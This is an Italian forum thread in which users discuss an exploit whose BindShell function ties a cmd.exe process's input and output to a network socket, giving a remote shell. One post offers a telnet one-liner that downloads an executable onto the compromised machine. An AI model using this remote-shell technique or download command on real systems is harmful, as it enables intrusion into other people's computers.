|
|
|
![]() |
|
Strumenti |
![]() |
#1 |
Bannato
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
|
incredibile!! O.o
guardate qua ...
![]() non è tanto l'exploit della keybd_event la cosa che mi stupisce (capirai, è assai banale, nella maggior parte dei desktop è pure inutile se ho capito come funziona...), ma quello che viene eseguito nella funzione BindShell!! ![]() viene creato un processo cmd.exe i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!! ![]() ma si può fare? ![]() cioè, Winsock2 è fatto apposta per fornire shell remote agli hackers che installano trojans o sbaglio...? ![]() se è così mi cade giusto a fagiuuoolo ![]() ![]() |
![]() |
![]() |
![]() |
#2 |
Senior Member
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 414
|
Si infatti cosa molto banale ma estremamente pericolosa, per esempio tanto per pensare un pò da hacker
![]() Codice:
telnet miamacchina miaporta >file.exe a logicamente per eseguirlo hai a disposizione la scell Cavolo che fico!!! |
![]() |
![]() |
![]() |
#3 | |
Senior Member
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
|
Quote:
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12 |
|
![]() |
![]() |
![]() |
#4 | |
Bannato
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
|
Quote:
![]() e poi lo so che può tornare mooolto comodo, ehehehe lo so eccome ![]() |
|
![]() |
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 07:18.